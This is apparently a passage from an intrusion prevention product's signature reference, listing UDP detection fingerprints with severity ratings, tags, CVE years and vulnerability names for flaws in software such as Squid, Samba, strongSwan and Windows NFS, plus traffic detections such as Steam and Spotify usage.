Tags: Windows, Any Hardware, Pro Server EX, Windows not specific, Potential Denial of Service
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Pro-Server-EX-Denial-Of-Service
Description:
Back to top

Generic_UDP-QUIC-Client-Hello

About this situation: QUIC client hello
Context: UDP Packet Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-795-5211
Last changed: sgpkg-ips-795-5211
Description:
Back to top

Generic_UDP-Quic-go-Crypto-Ack-Nil-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in quic-go detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, quic-go, CVE2023, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1681-5242
Last changed: sgpkg-ips-1681-5242
Vulnerability: Quic-go-Crypto-Ack-Nil-Pointer-Dereference
Description:
Back to top

Generic_UDP-Racer-Buffer-Overflow

About this situation: An attempt to exploit a Racer Buffer Overflow vulnerability detected.
Context: UDP Packet Unknown
Severity: 7
Tags: Windows XP, Any Hardware, Racer, CVE2007, Windows XP not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-731-5211
Vulnerability: Racer-Buffer-Overflow
Description:
Back to top

Generic_UDP-RealNetworks-Helix-Server-Describe-Request-Buffer-Overflow

About this situation: Buffer overflow exploit against RealNetworks Helix Server detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, RealNetworks Helix Universal Server, CVE2006, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: RTSP-RealNetworks-Helix-Server-Describe-Request-Buffer-Overflow
Description:
Back to top

Generic_UDP-RealNetworks-Helix-Server-RN5auth-Credential-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in RealNetworks Helix Mobile Server detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, RealNetworks Helix Server, RealNetworks Helix Mobile Server, CVE2012, Any Operating System not specific, RealNetworks Helix Server not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-454-4333
Last changed: sgpkg-ips-454-4333
Vulnerability: RealNetworks-Helix-Server-RN5auth-Credential-Parsing-Buffer-Overflow
Description:
Back to top

Generic_UDP-Realtek-SDK-MP-Daemon-UDPServer-Command-Injection-CVE-2021-35394

About this situation: An attempt to exploit a vulnerability in Realtek SDK detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Realtek SDK, CVE2021, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Vulnerability: Realtek-SDK-MP-Daemon-UDPServer-Command-Injection-CVE-2021-35394
Description:
Back to top

Generic_UDP-RPC-Ypupdated-Arbitrary-Command-Execution

About this situation: Attempt to exploit a command injection vulnerability in the rpc.ypupdated service detected
Context: UDP Packet Unknown
Severity: 7
Tags: Unix, Any Hardware, rpc.ypupdated, CVE1999, Unix not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-478-5211
Vulnerability: RPC-Ypupdated-Arbitrary-Command-Execution
Description:
Back to top

Generic_UDP-Rpcbind-Xdr-Parsing-Memory-Exhaustion-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Rpcbind libtirpc detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, RPC, CVE2017, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Vulnerability: Rpcbind-Xdr-Parsing-Memory-Exhaustion-Denial-Of-Service
Description:
Back to top

Generic_UDP-Rsyslog-Pri-Value-Parsing-Integer-Overflow-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Infodrom Oldenburg sysklogd detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, rsyslog, CVE2014, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Rsyslog-Pri-Value-Parsing-Integer-Overflow-Denial-Of-Service
Description:
Back to top

Generic_UDP-Rugged-Director-Denial-Of-Service

About this situation: A vulnerability in Rugged Director ROS allowing denial of service.
Context: UDP Packet Unknown
Severity: 2
Tags: Windows, Any Hardware, Rugged Director, Windows not specific, Potential Denial of Service
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Rugged-Director-Denial-Of-Service
Description:
Back to top

Generic_UDP-Safenet-Softremote-Stack-Based-Buffer-Overflow

About this situation: Safenet Softremote Stack Based Buffer Overflow
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, SafeNet SoftRemote, CVE2009, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-653-5211
Last changed: sgpkg-ips-653-5211
Vulnerability: Safenet-Softremote-Stack-Based-Buffer-Overflow
Description:
Back to top

Generic_UDP-Samba-Domain-Controller-Crafted-Mailslot-Name-Buffer-Overflow

About this situation: Detects buffer overflow attacks against Samba mailslots
Context: UDP Packet Unknown
Severity: 7
Tags: Solaris, Linux, Mac OS X, Any Hardware, Samba, CVE2007, Solaris not specific, Linux not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-135-2032
Last changed: sgpkg-ips-348-4219
Vulnerability: SMB-Samba-Domain-Controller-Service-Crafted-Mailslot-Name-Buffer-Overflow
Description:
Back to top

Generic_UDP-Samba-NetBIOS-Replies-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a Samba NetBIOS Replies Stack Based Buffer Overflow vulnerability detected.
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2007, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-681-5211
Last changed: sgpkg-ips-681-5211
Vulnerability: Samba-NetBIOS-Replies-Stack-Based-Buffer-Overflow
Description:
Back to top

Generic_UDP-Shared-Variables

About this situation: This fingerprint sets shared variables
Context: UDP Packet Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-1336-5242
Last changed: sgpkg-ips-1526-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

Generic_UDP-Siemens-SIPROTEC-4-And-SIPROTEC-Compact-EN100-Ethernet-Module-DoS

About this situation: An attempt to exploit a vulnerability in Siemens SIPROTEC devices detected.
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Siemens SIPROTEC, CVE2015, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1426-5242
Last changed: sgpkg-ips-1426-5242
Vulnerability: Siemens-SIPROTEC-4-And-SIPROTEC-Compact-EN100-Ethernet-Module-DoS
Description:
Back to top

Generic_UDP-Snort-Back-Orifice-Pre-Processor-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Snort Project Snort detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Snort, CVE2005, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1193-5242
Vulnerability: Snort-Back-Orifice-Pre-Processor-Buffer-Overflow
Description:
Back to top

Generic_UDP-Snort-frag3-Preprocessor-Fragmented-IP-Packet-Detection-Evasion

About this situation: A Snort frag3 Preprocessor Fragmented IP Packet Detection Evasion vulnerability
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Snort, CVE2006, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1001-5242
Last changed: sgpkg-ips-1001-5242
Vulnerability: Snort-frag3-Preprocessor-Fragmented-IP-Packet-Detection-Evasion
Description:
Back to top

Generic_UDP-Solaris-Rwalld-RPC-Call-Format-String

About this situation: Detects format string exploits against Rwalld
Context: UDP Packet Unknown
Severity: 7
Tags: Solaris 9, Solaris 8, Solaris 7, Sun Solaris 2.6, Any Hardware, rpc.rwalld, CVE2002, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-485-5211
Vulnerability: Solaris-Rwalld-RPC-Call-Format-String-Vulnerability
Description:
Back to top

Generic_UDP-Spotify-UDP-Traffic

About this situation: Spotify traffic detected
Context: UDP Packet Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Spotify, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-423-4219
Last changed: sgpkg-ips-423-4219
Vulnerability: Spotify-Usage
Description:
Back to top

Generic_UDP-Squid-ASN.1-Header-Parsing-Denial-of-Service

About this situation: A Squid ASN.1 Header Parsing Denial of Service vulnerability
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2004, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1001-5242
Last changed: sgpkg-ips-1001-5242
Vulnerability: Squid-ASN.1-Header-Parsing-Denial-Of-Service
Description:
Back to top

Generic_UDP-Squid-Proxy-HTCP-Packet-Processing-Denial-Of-Service

About this situation: An attempt to exploit a denial of service vulnerability in Squid Proxy detected
Context: UDP Packet Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Squid, CVE2010, Any Operating System not specific, Potential Denial of Service
First detected in: sgpkg-ips-293-4219
Last changed: sgpkg-ips-529-5211
Vulnerability: Squid-Proxy-HTCP-Packet-Processing-Denial-Of-Service
Description:
Back to top

Generic_UDP-Squid-Proxy-Unspecified-DNS-Spoofing-Vulnerability

About this situation: An attempt to exploit a Squid Proxy Unspecified DNS Spoofing Vulnerability vulnerability.
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2005, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-679-5211
Last changed: sgpkg-ips-679-5211
Vulnerability: Squid-Proxy-Unspecified-DNS-Spoofing-Vulnerability
Description:
Back to top

Generic_UDP-Squid-WCCP-Malformed-Message-DoS

About this situation: An attempt to exploit a vulnerability in Squid detected
Context: UDP Packet Unknown
Severity: 7
Tags: Unix, Any Hardware, Squid, CVE2005, Unix not specific, Suspected Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-413-4219
Vulnerability: Squid-WCCP-Malformed-Message-DoS
Description:
Back to top

Generic_UDP-SS-ISS-PAM-ICQ-Parsing-BOF-1

About this situation: Attempt to exploit the ICQ parsing buffer overflow in ISS PAM
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, x86, ISS BlackICE, Proventia A/G/M, RealSecure, CVE2004, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-492-5211
Vulnerability: ISS-PAM-ICQ-Parsing-BOF
Description:
Back to top

Generic_UDP-SS-ISS-PAM-ICQ-Parsing-BOF-2

About this situation: Attempt to exploit the ICQ parsing buffer overflow in ISS PAM
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, x86, ISS BlackICE, Proventia A/G/M, RealSecure, CVE2004, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: ISS-PAM-ICQ-Parsing-BOF
Description:
Back to top

Generic_UDP-SS-ISS-PAM-ICQ-Parsing-BOF-3

About this situation: Attempt to exploit the ICQ parsing buffer overflow in ISS PAM
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, x86, ISS BlackICE, Proventia A/G/M, RealSecure, CVE2004, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: ISS-PAM-ICQ-Parsing-BOF
Description:
Back to top

Generic_UDP-StrongSwan-Gmp-Plugin-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in strongSwan detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, strongSwan, CVE2017, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1000-5242
Vulnerability: StrongSwan-Gmp-Plugin-Denial-Of-Service
Description:
Back to top

Generic_UDP-StrongSwan-OpenSSL-Plugin-Fips-Mode-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in strongSwan strongSwan detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, strongSwan, CVE2018, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: StrongSwan-OpenSSL-Plugin-Fips-Mode-Denial-Of-Service
Description:
Back to top

Generic_UDP-StrongSwan-Rsassa-Pss-Signature-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in strongSwan strongSwan detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, strongSwan, CVE2018, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1050-5242
Last changed: sgpkg-ips-1050-5242
Vulnerability: StrongSwan-Rsassa-Pss-Signature-Denial-Of-Service
Description:
Back to top

Generic_UDP-StrongSwan-X509-Plugin-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in strongSwan strongSwan detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, strongSwan, CVE2017, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-958-5242
Last changed: sgpkg-ips-1075-5242
Vulnerability: StrongSwan-X509-Plugin-Denial-Of-Service
Description:
Back to top

Generic_UDP-Sun-Solaris-DHCP-Client-Arbitrary-Code-Execution

About this situation: An attempt to exploit a vulnerability in Sun Solaris detected
Context: UDP Packet Unknown
Severity: 7
Tags: Solaris, Any Hardware, CVE2005, Solaris not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Sun-Solaris-DHCP-Client-Arbitrary-Code-Execution
Description:
Back to top

Generic_UDP-Sun-Solaris-Rwhod-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Sun Solaris detected
Context: UDP Packet Unknown
Severity: 7
Tags: Solaris, Sparc, CVE2004, Solaris not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: Sun-Solaris-Rwhod-Buffer-Overflow
Description:
Back to top

Generic_UDP-Sun-Solaris-sadmind-RPC-Request-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Sun Microsystems Solaris detected
Context: UDP Packet Unknown
Severity: 7
Tags: Solaris, Any Hardware, CVE2008, Solaris not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-389-4219
Last changed: sgpkg-ips-389-4219
Vulnerability: Sun-Solaris-sadmind-RPC-Request-Buffer-Overflow
Description:
Back to top

Generic_UDP-Sun-Solaris-sadmind-RPC-Request-Integer-Overflow-CVE-2008-3870

About this situation: An attempt to exploit a vulnerability in Sun Microsystems Solaris detected
Context: UDP Packet Unknown
Severity: 7
Tags: Solaris, Any Hardware, RPC, CVE2008, Solaris not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-384-4219
Vulnerability: Sun-Solaris-sadmind-RPC-Request-Integer-Overflow-CVE-2008-3870
Description:
Back to top

Generic_UDP-SunRPC-Portmapper-Dump-Query

About this situation: Detected portmapper dump query
Context: UDP Packet Unknown
Severity: 2
Tags: Unix, Any Hardware, Unix not specific, Potential Probe
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Vulnerability: RPC-Portmapper-Access
Description:
Back to top

Generic_UDP-SunRPC-Portmapper-GetPort-Query

About this situation: Detected portmap getport query
Context: UDP Packet Unknown
Severity: 2
Tags: Unix, Any Hardware, Unix not specific, Potential Probe
First detected in: sgpkg-ips-791-5211
Last changed: sgpkg-ips-791-5211
Vulnerability: RPC-Portmapper-Access
Description:
Back to top

Generic_UDP-SunRPC-Xdr-Xdrmem-Getbytes-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Sun RPC Library
Context: UDP Packet Unknown
Severity: 7
Tags: Unix, Any Hardware, CVE2003, Unix not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-478-5211
Last changed: sgpkg-ips-478-5211
Vulnerability: SunRPC-Xdr-Xdrmem-Getbytes-Integer-Overflow
Description:
Back to top

Generic_UDP-Suspicious-IPP-Request-CVE-2024-47176

About this situation: An attempt to exploit a vulnerability in cups-browsed detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, cups-browsed, CVE2024, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1786-5242
Last changed: sgpkg-ips-1788-5242
Vulnerability: Suspicious-IPP-Request-CVE-2024-47176
Description: Note that this fingerprint could be prone to false positives. However, when you see many IPP requests in a short amount of time, it could indicate the system is being used for a denial-of-service attack. Source Host: $([[$LN_IP_SOURCE]]/ipv4) Source Port: $([[$LN_PORT_SOURCE]]) Destination Host: $([[$LN_IP_DEST]]/ipv4) Destination Port: $([[$LN_PORT_DEST]])
Back to top

Generic_UDP-Suspicious-Packet

About this situation: A suspicious traffic pattern detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-498-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

Generic_UDP-Suspicious-Server-Certificate

About this situation: Detected a known suspicious server certificate
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-674-5211
Last changed: sgpkg-ips-674-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

Generic_UDP-Symantec-DNS-Compression-DoS

About this situation: An attempt to exploit a vulnerability in multiple Symantec products detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Norton AntiSpam, Symantec Norton Personal Firewall, Symantec Norton Internet Security, Symantec Client Security, Symantec Client Firewall, CVE2004, Any Operating System not specific, Suspected Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-599-5211
Vulnerability: Symantec-DNS-Compression-DoS
Description:
Back to top

Generic_UDP-Symantec-Multiple-Products-ISAKMPD-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Symantec Gateway Security detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Gateway Security, CVE2004, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Symantec-Multiple-Products-ISAKMPD-Denial-Of-Service
Description:
Back to top

Generic_UDP-Symantec-Norton-Firewall-NBNS-Response-Remote-Heap-Corruption

About this situation: An attempt to exploit a vulnerability in Symantec Norton AntiSpam detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Symantec Norton AntiSpam, Symantec Norton Personal Firewall, Symantec Norton Internet Security, CVE2004, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Symantec-Norton-Firewall-NBNS-Response-Remote-Heap-Corruption
Description:
Back to top

Generic_UDP-Symantec-pcAnywhere-Client-Name-Query

About this situation: Symantec pcAnywhere remote control software usage detected
Context: UDP Packet Unknown
Severity: 2
Tags: Windows, Any Hardware, Symantec pcAnywhere, Windows not specific, Remote Control
First detected in: sgpkg-ips-276-4219
Last changed: sgpkg-ips-276-4219
Vulnerability: Symantec-pcAnywhere-Usage
Description:
Back to top

Generic_UDP-Symantec-pcAnywhere-Client-Name-Reply

About this situation: Symantec pcAnywhere remote control software usage detected
Context: UDP Packet Unknown
Severity: 2
Tags: Windows, Any Hardware, Symantec pcAnywhere, Windows not specific, Remote Control
First detected in: sgpkg-ips-276-4219
Last changed: sgpkg-ips-276-4219
Vulnerability: Symantec-pcAnywhere-Usage
Description:
Back to top

Generic_UDP-Symantec-Veritas-Storage-Foundation-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Symantec Veritas Storage Foundation detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Veritas Storage Foundation, CVE2008, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Symantec-Veritas-Storage-Foundation-Buffer-Overflow
Description:
Back to top

Generic_UDP-Tcpdump-ISAKMP-Payload-Handling-DOS

About this situation: An attempt to exploit a vulnerability in Network Research Group TCPdump detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Tcpdump, CVE2004, Any Operating System not specific, Suspected Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: Tcpdump-ISAKMP-Payload-Handling-DOS
Description:
Back to top

Generic_UDP-TP-Link-Archer-A7-tdpServer-Command-Injection

About this situation: An attempt to exploit a vulnerability in TP-Link Archer A7 routers detected.
Context: UDP Packet Unknown
Severity: 7
Tags: Linux, Any Hardware, TP-Link, CVE2020, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Vulnerability: TP-Link-Archer-A7-tdpServer-Command-Injection
Description:
Back to top

Generic_UDP-Trace-Mode-UDP-Denial-Of-Service-1-Ver1

About this situation: A vulnerability in Trace Mode allowing denial of service
Context: UDP Packet Unknown
Severity: 2
Tags: Windows, Any Hardware, Trace Mode, Windows not specific, Potential Denial of Service
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Trace-Mode-UDP-Denial-Of-Service-1-Ver1
Description:
Back to top

Generic_UDP-Trace-Mode-UDP-Denial-Of-Service-1-Ver2

About this situation: A vulnerability in Trace Mode allowing denial of service
Context: UDP Packet Unknown
Severity: 2
Tags: Windows, Any Hardware, Trace Mode, Windows not specific, Potential Denial of Service
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Trace-Mode-UDP-Denial-Of-Service-1-Ver2
Description:
Back to top

Generic_UDP-Trace-Mode-UDP-Denial-Of-Service-1-Ver3

About this situation: A vulnerability in Trace Mode allowing denial of service
Context: UDP Packet Unknown
Severity: 2
Tags: Windows, Any Hardware, Trace Mode, Windows not specific, Potential Denial of Service
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Trace-Mode-UDP-Denial-Of-Service-1-Ver3
Description:
Back to top

Generic_UDP-Trace-Mode-UDP-Denial-Of-Service-1-Ver4

About this situation: A vulnerability in Trace Mode allowing denial of service
Context: UDP Packet Unknown
Severity: 2
Tags: Windows, Any Hardware, Trace Mode, Windows not specific, Potential Denial of Service
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Trace-Mode-UDP-Denial-Of-Service-1-Ver4
Description:
Back to top

Generic_UDP-Unix-System-Monitor-Messages

About this situation: Unix system monitor output messages detected
Context: UDP Packet Unknown
Severity: 2
Tags: Unix, Any Hardware, Unix not specific, Potential Disclosure
First detected in: sgpkg-ips-660-5211
Last changed: sgpkg-ips-660-5211
Vulnerability: Unix-System-Monitor-Messages
Description:
Back to top

Generic_UDP-UPnP-IGD-Apple-Mac-OSX-mDNSResponder-Compromise

About this situation: Detects exploits against a vulnerability in Apple mDNSResponder
Context: UDP Packet Unknown
Severity: 7
Tags: Mac OS X, Any Hardware, CVE2007, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-150-2032
Last changed: sgpkg-ips-150-2032
Vulnerability: UPnP-IGD-Apple-Mac-OSX-mDNSResponder-Compromise
Description:
Back to top

Generic_UDP-Valve-Steam-Server-Query

About this situation: Valve Steam Server Query packet seen
Context: UDP Packet Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1077-5242
Last changed: sgpkg-ips-1077-5242
Description:
Back to top

Generic_UDP-Valve-Steam-Usage

About this situation: Detected Valve Steam protocol usage
Context: UDP Packet Unknown
Severity: 2
Tags: Windows, Any Hardware, Valve Steam, Windows not specific, Online Gaming Protocols
First detected in: sgpkg-ips-206-2032
Last changed: sgpkg-ips-207-2032
Vulnerability: Valve-Steam-Usage
Description:
Back to top

Generic_UDP-W32/Nuwar@mm-Activity

About this situation: W32/Nuwar@MM activity detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Adware-Rapidblaster
Description:
Back to top

Generic_UDP-W32/Nuwar@mm-Encrypted-Traffic

About this situation: W32/Nuwar@MM Encrypted Traffic detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1650-5242
Vulnerability: W32/Nuwar@mm-Malware
Description:
Back to top

Generic_UDP-Windows-Kerberos-Security-Feature-Bypass-CVE-2025-29809

About this situation: An attempt to exploit a vulnerability in Windows Kerberos detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2025-04, CVE2025, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1864-5242
Last changed: sgpkg-ips-1864-5242
Vulnerability: Windows-Kerberos-Security-Feature-Bypass-CVE-2025-29809
Description:
Back to top

Generic_UDP-Windows-NFS-CVE-2022-24491

About this situation: Windows NFS RCE CVE-2022-24491
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2022-04, CVE2022, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1454-5242
Last changed: sgpkg-ips-1454-5242
Vulnerability: Windows-NFS-Service-RCE-CVE-2022-24491
Description:
Back to top

Generic_UDP-Windows-NFS-CVE-2022-24497

About this situation: Windows NFS RCE CVE-2022-24497
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2022-04, CVE2022, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1454-5242
Last changed: sgpkg-ips-1454-5242
Vulnerability: Windows-NFS-Service-RCE-CVE-2022-24497
Description:
Back to top

Generic_UDP-WinRadius-User-Password-Option-Size-Validation-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in WinRadius detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, WinRadius, CVE2012, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1138-5242
Last changed: sgpkg-ips-1138-5242
Vulnerability: WinRadius-User-Password-Option-Size-Validation-Buffer-Overflow
Description:
Back to top

Generic_UDP-WINS-WPAD-Host-Name-Registration

About this situation: Detected an attempt to register host name WPAD for WINS name services
Context: UDP Packet Unknown
Severity: 7
